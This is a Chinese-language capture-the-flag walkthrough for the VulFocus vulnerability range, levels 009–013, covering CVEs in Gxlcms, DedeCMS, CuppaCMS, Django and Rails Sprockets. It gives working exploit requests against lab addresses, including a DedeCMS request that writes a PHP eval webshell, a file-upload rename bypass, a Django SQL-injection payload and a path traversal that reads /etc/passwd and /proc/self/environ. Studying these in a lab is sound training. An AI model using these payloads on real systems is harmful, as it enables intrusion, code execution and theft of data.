漏洞指北-VulFocus靶场专栏-中级03

中级009 gxlcms-cve_2018_14685

原因：
Gxlcms 1.1.4版本中的www/Lib/Lib/Action/Admin/TplAction.class.php文件的‘add’函数存在安全漏洞。远程攻击者可通过发送特制的index.php?s=Admin-Tpl-ADD-id请求利用该漏洞读取任意文件.
账号：admin 密码：admin888
解决方案：

step1：安装系统 密码root

http://10.11.12.28:17302/manager/login.php

step2 进入后台页面 账号密码：admin amdin888

step3 查看详细 有phpinfo()

中级010 dedecms-cnvd_2018_01221

原因：最好用火狐 有hackbar免费插件
Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。该漏洞利用需要登录后台,并且后台的账户权限是管理员权限。
解决方案：

step1：登录admin admin

step2:加入 请求头payload

http://10.11.12.28:43491/dede/tpl.php?action=savetagfile&token=&filename=abc.lib.php&content=%3C?php%20@eval($_POST[cmd]);?%3E

step3 写入abc.lib.php文件（这个好使，上面那个试一下没反应）直接看phpinfo（）

http://10.11.12.28:43491/dede/tpl.php?action=savetagfile&token=ff5cd321ece87d556508192c04821ff0&filename=abc.lib.php&content=%3C?php%20phpinfo();?%3E
http://10.11.12.28:43491/dede/tag_test_action.php

中级011 cuppacms-cve_2020_26048

原因：
CuppaCMS 2019-11-12之前版本存在安全漏洞，攻击者可利用该漏洞在图像扩展内上传恶意文件，通过使用文件管理器提供的重命名函数的自定义请求，可以将图像扩展修改为PHP，从而导致远程任意代码执行。
解决方案：

step1：登录admin 123456

step2: 选择file manager

在File Mangager功能中的rename功能是通过前端js进行的，导致rename功能可以抓包绕过，改为.php后缀，导致shell。

step3 上传php文件的图片格式，拦截请求

l拦截错包了，是是第二个包，看清post的头是不是filemanager

step4 修改post 重命名格式

step5 删除.htaccess文件

step6 看怎么写了，如果写一句话木马，那就用中国蚁剑连接，我没用，我直接写的 ls /tmp语句,点入网址就行

中级012 django SQL注入（CVE-2019-14234）

原因：
Python编写，许多网站和app都基于Django开发。Django采用了MTV的框架模式，即模型M，视图V和模版T，使用Django，程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件，使得Django具有较强的可扩展性。

该漏洞需要开发者使用了JSONField/HStoreField，且用户可控queryset查询时的键名，在键名的位置注入SQL语句。可以利用CVE-2019-14234(SQL注入漏洞)向服务器传送包含CVE-2019-9193(命令执行漏洞)系统命令的SQL语句，从而利用SQL语句，执行任意系统命令。
解决方案：

step1：进入后台

http://10.11.12.28:28718/admin/

step2: 加入payload

/admin/vuln/collection/?detail__a%27b=123

step3：搜索flag即可

中级013 Ruby On Rails 路径遍历漏洞（CVE-2018-3760）

原因：
环境中使用 Sprockets 作为静态文件服务器。Sprockets 是一个编译和分发静态资源文件的 Ruby 库。 Sprockets 3.7.1及更低版本存在二次解码导致的路径遍历漏洞。攻击者可以%252e%252e/用来访问根目录并读取或执行目标服务器上的任何文件。
解决方案：

step1：验证漏洞路径

http://10.11.12.28:10368/assets/file:%2f%2f/etc/passwd

step2 burp suite抓包

step3 改包 ，response里寻找flag

GET /assets/file:%2F%2F/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/proc/self/environ HTTP/1.1